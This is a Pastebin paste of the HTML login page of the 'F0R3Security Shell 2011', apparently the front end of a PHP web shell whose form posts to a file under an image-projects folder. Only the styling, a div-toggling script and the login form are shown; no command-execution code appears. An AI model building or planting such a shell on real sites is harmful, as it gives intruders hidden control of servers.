Guest User

Untitled

a guest
Jun 17th, 2018
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.43 KB | None | 0 0
  1. <html dir=rtl>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  4. <title>F0R3Security Shell 2011</title>
  5.  
  6. <STYLE>
  7.  
  8. BODY
  9. {
  10. SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  11. }
  12.  
  13. tr {
  14. BORDER-RIGHT: #dadada ;
  15. BORDER-TOP: #dadada ;
  16. BORDER-LEFT: #dadada ;
  17. BORDER-BOTTOM: #dadada ;
  18. color: #ffffff;
  19. }
  20. td {
  21. BORDER-RIGHT: #dadada ;
  22. BORDER-TOP: #dadada ;
  23. BORDER-LEFT: #dadada ;
  24. BORDER-BOTTOM: #dadada ;
  25. color: #dadada;
  26. }
  27. .table1 {
  28. BORDER: 1;
  29. BACKGROUND-COLOR: #000000;
  30. color: #333333;
  31. }
  32. .td1 {
  33. BORDER: 1;
  34. font: 7pt tahoma;
  35. color: #ffffff;
  36. }
  37. .tr1 {
  38. BORDER: 1;
  39. color: #dadada;
  40. }
  41. table {
  42. BORDER: #eeeeee outset;
  43. BACKGROUND-COLOR: #000000;
  44. color: #dadada;
  45. }
  46. input {
  47. BORDER-RIGHT: #00FF00 1 solid;
  48. BORDER-TOP: #00FF00 1 solid;
  49. BORDER-LEFT: #00FF00 1 solid;
  50. BORDER-BOTTOM: #00FF00 1 solid;
  51. BACKGROUND-COLOR: #333333;
  52. font: 9pt tahoma;
  53. color: #ffffff;
  54. }
  55. select {
  56. BORDER-RIGHT: #ffffff 1 solid;
  57. BORDER-TOP: #999999 1 solid;
  58. BORDER-LEFT: #999999 1 solid;
  59. BORDER-BOTTOM: #ffffff 1 solid;
  60. BACKGROUND-COLOR: #000000;
  61. font: 9pt tahoma;
  62. color: #dadada;;
  63. }
  64. submit {
  65. BORDER: buttonhighlight 1 outset;
  66. BACKGROUND-COLOR: #272727;
  67. width: 40%;
  68. color: #dadada;
  69. }
  70. textarea {
  71. BORDER-RIGHT: #ffffff 1 solid;
  72. BORDER-TOP: #999999 1 solid;
  73. BORDER-LEFT: #999999 1 solid;
  74. BORDER-BOTTOM: #ffffff 1 solid;
  75. BACKGROUND-COLOR: #333333;
  76. font: Fixedsys bold;
  77. color: #ffffff;
  78. }
  79. BODY {
  80. margin: 1;
  81. color: #dadada;
  82. background-color: #000000;
  83. }
  84. A:link {COLOR:red; TEXT-DECORATION: none}
  85. A:visited { COLOR:red; TEXT-DECORATION: none}
  86. A:active {COLOR:red; TEXT-DECORATION: none}
  87. A:hover {color:blue;TEXT-DECORATION: none}
  88.  
  89. </STYLE>
  90. <script language=\'javascript\'>
  91. function hide_div(id)
  92. {
  93. document.getElementById(id).style.display = \'none\';
  94. document.cookie=id+\'=0;\';
  95. }
  96. function show_div(id)
  97. {
  98. document.getElementById(id).style.display = \'block\';
  99. document.cookie=id+\'=1;\';
  100. }
  101. function change_divst(id)
  102. {
  103. if (document.getElementById(id).style.display == \'none\')
  104. show_div(id);
  105. else
  106. hide_div(id);
  107. }
  108. </script>';
  109.  
  110. <body>
  111. <br><br><div style="font-size: 14pt;" align="center">F0R3Security Shell 2011</div>
  112. <hr width="300" size="1" noshade color="#cdcdcd">
  113. <p>
  114. <div align="center" class="grey">
  115. F0R3Security Shell 2011</div>
  116. <p>
  117. <form name="txtauth" action="/img_proyectos/fore.php" method="post">
  118. <div align="center">
  119. <table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
  120. <tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  121. <tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  122. <tr><td align="left"><input type="submit" name="login" value="Login">
  123. </td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">
  124. Remmeber Me?</label></td></tr>
  125. </table>
  126. </div>
  127. </form>
  128.  
  129. <br><br>
  130. <hr width="300" size="1" noshade color="#cdcdcd">
  131. <div class="smalltxt" align="center">coder by
  132. <a href="mailto:F0R3Security@hotmail.com">F0R3Security Shell 2011 </a>· copyright ©
  133. & F0-Se</div>
  134.  
  135. </body>
  136. </html>
Add Comment
Please, Sign In to add comment